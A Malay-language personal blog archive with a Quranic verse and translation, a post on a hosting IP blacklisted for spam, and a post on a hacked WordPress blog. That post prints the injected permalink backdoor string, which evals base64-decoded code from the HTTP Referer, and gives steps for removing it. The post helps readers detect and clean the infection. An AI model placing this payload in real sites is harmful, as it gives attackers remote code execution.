Mencari sesuatu mengenai panduan blog, agama, berita dari internet, video menarik dan isu semasa.

Archive for September, 2009

Hayati Surah Al-Baqarah (2:285-6) – Amanar Rasul

Sudah hampirnya berakhir bulan ramadhan maka akan tiba nya bulan syawal. Entah kenapa saya naik syok pula menghayati surah ini. Jadi untuk kategori video pilihan kali ini, saya telah mencari video di youtube untuk berkongsi bersama.

Amanar Rasul

Bismillaah ar-Rahman ar-Raheem

Amanar-rasulu bima unzila ilayhi min rabbihi wal-muminun
Kullun amana billahi wa mala ikatihi wa kutubihi wa rusulih
La nufarriqu bayna ahadin min rusulih
Wa qalu sami’na wa a-ta’na ghufranaka rabbana wa ilaykal masir
La yukallifullahu nafsan illa wus’aha
Laha ma kasabat wa alayha maktasabat
Rabbana la tu akhidhna in nasina au akhta’na
Rabbana wa la tahmil alayna isran kama
Hamaltahu alalladhina min qablina
Rabbana wa la tuhammilna ma la taqata lanabih
Wa’fu anna, waghfir lana, warhamna
Anta maulana fansurna alal-qaumil-kafirin

Saddaqallah hul Azim

Maknanya :-

Rasul telah beriman kepada Al Qur’an yang diturunkan kepadanya dari Tuhannya, demikian pula orang-orang yang beriman. Semuanya beriman kepada Allah, malaikat-malaikat-Nya, kitab-kitab-Nya dan rasul-rasul-Nya. (Mereka mengatakan): “Kami tidak membeda-bedakan antara seseorang pun (dengan yang lain) dari rasul rasul-Nya”, dan mereka mengatakan: “Kami dengar dan kami taat”. (Mereka berdoa): “Ampunilah kami ya Tuhan kami dan kepada Engkaulah tempat kembali”. Allah tidak membebani seseorang melainkan sesuai dengan kesanggupannya. Ia mendapat pahala (dari kebajikan) yang diusahakannya dan ia mendapat siksa (dari kejahatan) yang dikerjakannya. (Mereka berdo`a): “Ya Tuhan kami, janganlah Engkau hukum kami jika kami lupa atau kami tersalah. Ya Tuhan kami, janganlah Engkau bebankan kepada kami beban yang berat sebagaimana Engkau bebankan kepada orang-orang yang sebelum kami. Ya Tuhan kami, janganlah Engkau pikulkan kepada kami apa yang tak sanggup kami memikulnya. Beri maaflah kami; ampunilah kami; dan rahmatilah kami. Engkaulah Penolong kami, maka tolonglah kami terhadap kaum yang kafir”.

Popularity: 23% [?]

Dalam diam blog saya di hack oleh orang yang tidak bertanggungjawab!

Salam, blog peribadi saya ini telah terkena hack oleh seseorang yang tidak tahu kenapa masalah dia dengan saya Frown. Tapi alhamdulilah saya dapat mengesannya dengan segera! Mungkin saya perasan 2 hari selepas post terakhir saya Percaya atau tidak saya memang tak boleh nak ber’blog yang telah di buat pada hari Rabu hari tu.

Sudahlah saya ni jarang update blog, tiba-tiba blog url pun kena hack Frown. Tapi tidak mengapa, sebab saya telah berjaya solvekan problem ini. Masalah yang akan timbul selepas terkena hack ini ialah, seo blog anda akan lari serta merta, kerana user yang akan masuk ke blog atau post, akan mengalami masalah loading yang lama.

Pada tahun lepas, banyak blog wordpress yang telah terkena virus hack ini Razz, selalu nya orang yang tidak beretika ini akan mengunakan cara yang di panggil “MySQL Injection”, itu lah kelemahan platform yang ada, sebab mempunyai hole ke MySQL.

Anda boleh tengok image di bawah bagaimana untuk detect website anda terkena hack versi ini :-

blog-kena-hack

Pada mulanya, anda kena meletakkan mouse di blog post anda (title) seperti gambar di atas.

Selepas itu anda tengok di browser anda, seperti gambarajah di bawah :-

url-blog-kena-hack

[KLIK IMAGE PAPARAN BESAR]

Anda akan dapat melihat code sesat ini :-

&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&

Sekarang cara untuk solve problem ini :-

Login ke Cpanel anda, dan pergi ke phpMyAdmin.

Klik kepada database wordpress anda

Cari wp-options table, seperti gambar di bawah:-

phpMyAdminphpMyAdmin-browse-view

 

 

 

Anda boleh meneruskan langkah seperti di bawah

phpMyAdmin-permalink

 

 

 

 

Sila ikuti langkah-langkah di atas, saya mengunakan image mungkin memudahkan anda lagi Smile Gambar di bawah menunjukkan bagaimana anda boleh mengubah permalink tersebut.

phpMyAdmin-ubah-permalink

 

 

 

 

 

 

Saya rasa sudah memadai, jika anda mempunyai masalah dalam masalah ini, anda boleh terus menghubungi saya untuk membantu anda Smile Anda boleh menghubungi saya di Contact Me

Popularity: 32% [?]

Percaya atau tidak saya memang tak boleh nak ber’blog

Salam kepada semua pembaca setia, percaya atau tidak saya tidak dapat update blog buat masa sekarang. Oleh kerana saya sibuk dengan aktiviti pembinaan website yang perlu di lakukan segera!

Baru-baru ini, hosting business saya mempunyai masalah dalam menghantar email ke penguna Yahoo dan Hotmail. Selepas edit balik coding, memang sah ini bukan masalah daripada script tetapi bermasalah daripada hosting saya. Kerana pihak pembekal email (Yahoo dan Hotmail) telah ban kan ip hosting saya sebagai spammer. Bila masa pula saya duk spam orang ni? Biasalah kalau duduk dekat shared hosting, memang mengunakan IP address yang sama. Seorang buat taik semua orang kena Frown

Selepas maklumkan kepada pembekal hosting saya, tetapi tidak mengambil tindakan awal (maklumkan kepada pihak berkenaan). Saya mencari solution lain, iaitu tukar server yang lain! Ini semua demi pelanggan saya, untuk menjaga mutu dan kualiti perkhidmatan saya. Saya merasakan saya perlu melakukan perkara tersebut.

Masalah ini telah selesai pada hari isnin baru-baru ini. Sekarang masalah kedua saya ialah, website tersebut telah berada di pasaran! Maksud saya disini, saya telah mengiklankan website tersebut di blog-blog yang berkenaan! Tetapi beberapa function tidak berfungsi.

Ini yang saya sekarang tengah sibuk, sehinggakan tidak dapat update blog dan beberapa website saya lagi. Secara automatik revenue saya berkurangan untuk bulan ini Frown.

p/s: Rasa belum terlambat untuk mengucapkan selamat berpuasa. Sekian Terima Kasih Razz

Popularity: 23% [?]